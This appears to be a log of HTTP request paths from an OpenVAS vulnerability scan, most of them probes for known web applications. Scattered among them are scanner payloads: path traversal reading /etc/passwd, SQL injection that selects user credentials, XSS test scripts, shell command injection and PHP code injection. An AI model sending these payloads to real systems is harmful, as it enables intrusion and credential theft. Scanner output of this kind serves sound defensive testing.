 GET /star57cm/star57.cgi?download=;id|
 GET /start.html
 GET /start.php
 GET /start/about.htm
 GET /startup.html
 GET /startwlm/Start_Wlm.htm
 GET /static/../../../../../../../../../etc/passwd.
 GET /stats/index.php
 GET /status
 GET /stcenter.nsf
 GET /store/agora.cgi?cart_id=&xm=on&product=HTML
 GET /store/dlg/cart/index.php?page=1&c=&searchCart=">
 GET /store/index.php
 GET /stronghold-info
 GET /style-underground/search
 GET /subscribe/index.php
 GET /sugarsuite/acceptDecline.php?beanFiles[1]=../../../../../../../../etc/passwd&beanList[1]=1&module=1
 GET /svn/viewvc/
 GET /swdesk/signin.php
 GET /swhelpdesk//signin.php
 GET /sympa/
 GET /symphony/
 GET /sysaid/Login.jsp
 GET /syswww/login.xml
 GET /tabsFrame.dhtml
 GET /tangocms/README
 GET /tax/index.php
 GET /tcpdb/main.php
 GET /tdiary/index.rb
 GET /teleparkwiki/index.php
 GET /tematres/index.php
 GET /test.cgi.php
 GET /test.cgi.pl
 GET /test.php
 GET /test_cgi.php
 GET /tester/index.php
 GET /testlink/login.php
 GET /textpattern/index.php
 GET /tgbaQdNW.ini
 GET /this_page_should_not_exist.htm
 GET /tickets/index.php
 GET /tickets/main.php
 GET /tigercrm/index.php
 GET /tiki/tiki-index.php
 GET /tikiwiki/README
 GET /tikiwiki/tiki-index.php
 GET /tikiwiki/tiki-orphan_pages.php/>">
 GET /timesheet/about-show.do
 GET /tine/library/PHPExcel/PHPExcel/Shared/JAMA/docs/download.php/%27%3E%3Cscript%3Ealert(/openvas-xss-test/);%3C/script%3E
 GET /tinybb/index.php?page=profile&id=%27%20or%20%27a%27=%27a
 GET /tinywebgallery/admin/index.php
 GET /tjobs/jobdetails.php?jobid=-5%20union%20select%2012345678987654321,2,3,4,5,6,concat(admin,0x23,email,0x5D,loginname,0x7E,pass),8,9,0,1,2,3,4,5,6,7,8,9,0%20from%20users--
 GET /todayu/index.php
 GET /tomatocart/index.php
 GET /tomcat-docs/index.html
 GET /toplist/sources/functions.php?root_path=/etc/passwd%00
 GET /topsites/index.php
 GET /tracker/index.php
 GET /trade.php
 GET /traq/index.php
 GET /trombi/photo.php?id=-9999/**/union/**/select/**/1,2,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374--
 GET /ttc/upload/account-login.php
 GET /ttwm/tt/index.php
 GET /twiki/bin/twiki/view/Main/WebHome
 GET /twiki/bin/view/TWiki/WebHome
 GET /twiki/do/view/TWiki/WebHome
 GET /twiki/index.php
 GET /uebimiau/index.php
 GET /ui/login/
 GET /upb/db/users.dat
 GET /update.php
 GET /upload/index.php
 GET /upload/open.php
 GET /usage/
 GET /user.php
 GET /user/index.php
 GET /user/login
 GET /vc/index.php
 GET /vc_php/index.php
 GET /vcms/index.php
 GET /viart_shop/viart_shop.xml
 GET /vicidial.php
 GET /video/medialist.php
 GET /videoconference/index.php
 GET /viewheadline.php?id=-9%27%20union%20select%201,2,3,4,5,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20wp_users--+
 GET /voip/sipserver/login/
 GET /volve/site/login.php
 GET /voxalert/oben.php
 GET /voxlog/oben.php
 GET /vsmc.html
 GET /vsom/
 GET /vtigercrm/index.php
 GET /w-agora/search.php3?bn=%3Cbody%20onload=alert(%27openvas-xss-test%27)%3E
 GET /w-agora/search.php?bn=%3Cbody%20onload=alert(%27openvas-xss-test%27)%3E
 GET /w-cms/?p=
 GET /w-cms/index.php
 GET /w_cms/?p=
 GET /w_cms/index.php
 GET /wbb/upload/index.php
 GET /web/index.html
 GET /web/index.php
 GET /web/login.html
 GET /web/movielist.rss
 GET /webERP/index.php?PathPrefix=../../../../../../../../../../../../../../../../../../etc/passwd%00
 GET /webEdition/index.php?WE_LANGUAGE=../../../../../../../../etc/passwd%00
 GET /webEdition/openBrowser.php?url="onload="alert(/openvas-xss-test/)
 GET /webFileBrowser/webFileBrowser.php
 GET /web_reports/cgi-bin/InfoStation.cgi?mod=login&func=login&lang_code=en
 GET /webaccess/
 GET /webadmin/login.wdm.
 GET /weball/404.php?url=1%3Cscript%3Ealert(%27openvas-xss-test%27)%3C/script%3E
 GET /webatall/404.php?url=1%3Cscript%3Ealert(%27openvas-xss-test%27)%3C/script%3E
 GET /webauction/index.php
 GET /webcalendar/login.php
 GET /webdir/default.htm
 GET /webedition/openBrowser.php?url="onload="alert(/openvas-xss-test/)
 GET /weberp/AccountSections.php/%22%3E%3Cscript%3Ealert(/openvas-xss-test/);%3C/script%3E
 GET /weberp/index.php?PathPrefix=../../../../../../../../../../../../../../../../../../etc/passwd%00
 GET /webgrind/index.php
 GET /webid/index.php
 GET /webline/html/admin/wcs/LoginPage.jhtml?oper=login&dest=%2Fadmin%2FCiscoAdmin.jhtml
 GET /weblogger/index.php
 GET /webmail/
 GET /webmail/Mondo/lang/sys/login.aspx
 GET /webmail/index.php
 GET /webman/index.cgi
 GET /webmatic/index.php
 GET /webserv/index.ssi
 GET /websiteadmin/index.php
 GET /webstar.html
 GET /webtester/index.php
 GET /webtester5/index.php
 GET /webtools/control/main
 GET /whizzy/index.php?../../../../../../../boot.ini
 GET /whizzy/index.php?../../../../../../../etc/passwd
 GET /whois/dig.php?ns=||cat%20/etc/passwd&host=example.org&query_type=NS&status=digging
 GET /whois/index.php?ip=;/bin/cat%20/etc/passwd
 GET /wiki/
 GET /wiki/HomePage
 GET /wiki/Main/WebHome
 GET /wiki/bin/view/TWiki/WebHome
 GET /wiki/bin/view/foswiki/WebHome
 GET /wiki/do/view/TWiki/WebHome
 GET /wiki/index.php
 GET /wiki/index.php/Special:Version
 GET /wiki/index.php?page=/etc/passwd
 GET /wiki/tiki-index.php
 GET /wikihelp/handlers/getpage.php?id=9999999+UNION+SELECT+1,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,3,4,5,6,7+FROM+user+LIMIT+1
 GET /wikihelp/index.html
 GET /wikihelp/revert.php?rev=%3Cscript%3Ealert(%27OpenVAS-XSS-Test%27)%3C/script%3E
 GET /wikka/HomePage
 GET /wikka/test/files.xml?action=download&file=/../../wikka.config.php
 GET /wikkawiki/HomePage
 GET /wikki/test/files.xml?action=download&file=/../../wikka.config.php
 GET /wmail/login.php
 GET /wondercms/index.php?page=../../../../../../../../../etc/passwd%00
 GET /wonderdesk.cgi
 GET /wp_quiz/upload/index.php
 GET /wps/wcm/connect/%27%20or%20%27a%27%3d%27a
 GET /wps/wcm/connect/%27%20or%20%27a%27%3d%27b
 GET /wps/wcm/webinterface/login/login.jsp?%22%3E%3Cscript%3Ealert(%27openvas-xss-test%27)%3C/script%3E
 GET /wrm/index.php
 GET /wsnsd/index.php
 GET /wu-moadmin.php?db=admin&action=listRows&collection=fdsa&find=array();phpinfo();
 GET /wu-moadmin//moadmin.php?db=admin&action=listRows&collection=fdsa&find=array();phpinfo();
 GET /wu-moadmin//wu-moadmin.php?db=admin&action=listRows&collection=fdsa&find=array();phpinfo();
 GET /wwb/index.php?module=site&show=home
 GET /wwh/handlers/getpage.php?id=9999999+UNION+SELECT+1,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,3,4,5,6,7+FROM+user+LIMIT+1
 GET /wwh/index.html
 GET /wwh/index.php
 GET /wwh/revert.php?rev=%3Cscript%3Ealert(%27OpenVAS-XSS-Test%27)%3C/script%3E
 GET /www/admin/index.php
 GET /www/index.php?p=../../../../../../../../../..//etc/passwd%00
 GET /www/index.php?p=../../../../../../../../../../boot.ini%00
 GET /www/start.html
 GET /x-news/x_news.php
 GET /xBoard/main.php
 GET /xampp/dotproject_2_1_2/dotproject/index.php
 GET /xampp/splash.php
 GET /xampp/start.php
 GET /xaraya/index.php
 GET /xboard/main.php
 GET /xenon/viewstory.php?id=-8+and+1=1+union+select+0,1,2,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,4
 GET /xibo/index.php
 GET /xmldata?item=All
 GET /xoda/?upload_to=
 GET /xoops-2014rc1/htdocs/index.php
 GET /xoops-230/htdocs/index.php
 GET /xoops/htdocs/index.php
 GET /xoopscelepar/index.php
 GET /xsql/demo/adhocsql/query.xsql?sql=select%20username%20from%20ALL_USERS
 GET /xsql/demo/airport/airport.xsql?xml-stylesheet=none
 GET /xwiki/bin/view/Main/
 GET /xymon/xymon.html
 GET /yapig/
 GET /youronlineshop/index.php
 GET /zen-cart/extras/curltest.php?url=file:///etc/passwd
 GET /zen-cart/includes/initsystem.php?loader_file=../../../../../../../../../etc/passwd%00
 GET /zen-cart/index.php?typefilter=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
 GET /zen-cart/index.php?typefilter=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd%00
 GET /zenphoto/zp-core/admin.php?a="><script>alert(/openvas-xss-test/)</script>
 GET /zeroblog/thread.php
 GET /zikula/docs/CHANGELOG
 GET /zikula/docs/distribution/tour_page1.htm
 GET /zimbraAdmin/
 GET /zport/acl_users/cookieAuthHelper/login_form
 GET c:\boot.ini
 GET http://192.168.2.7/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F
 GET root
 HEAD /~anna_foo_fighter
 HEAD /~root
 OPTIONS *
 OPTIONS /
 POST /
 POST //admin/login.php
 POST //admin/lost-pass.php
 POST //engine/preview.php
 POST /FSF/CMD
 POST /LogRover/login.asp
 POST /apoll/admin/login.php
 POST /apoll/admin/lost-pass.php
 POST /cgi-bin/admin/login.php
 POST /cgi-bin/admin/lost-pass.php
 POST /cgi-bin/authLogin.cgi
 POST /cgi-bin/engine/preview.php
 POST /cgi-bin/index.cgi
 POST /cgi-bin/php?-dallow_url_include%3don+-dauto_prepend_file%3dphp://input
 POST /cgi-bin/restore_config.cgi
 POST /cgi-bin/server.php
 POST /cgi-bin/status
 POST /chillyCMS/admin/media.site.php
 POST /cms/admin/libraries/ajaxfilemanager/ajax_create_folder.php
 POST /cobbler_api
 POST /dasdec/dasdec.csp
 POST /datalife/engine/preview.php
 POST /feng_community/public/assets/javascript/ckeditor/ck_upload_handler.php
 POST /fm/ajaxfilemanager/ajax_create_folder.php
 POST /index.php
 POST /index.pl
 POST /license/records
 POST /login.php
 POST /login.pl
 POST /narcissus/backend.php
 POST /netmri/config/userAdmin/login.tdf
 POST /php-inventory/index.php
 POST /poll/admin/login.php
 POST /poll/admin/lost-pass.php
 POST /scripts/admin/index.php
 POST /scripts/admin/login.asp?Mode=login
 POST /scripts/admin/login.php
 POST /scripts/admin/lost-pass.php
 POST /scripts/engine/preview.php
 POST /scripts/weblibs.pl
 POST /status
 POST /test.cgi.php
 POST /test.cgi.pl
 POST /test_cgi.php
 PUT /puttest1.html
 TRACE /
 TRACE /OpenVAS613139139.html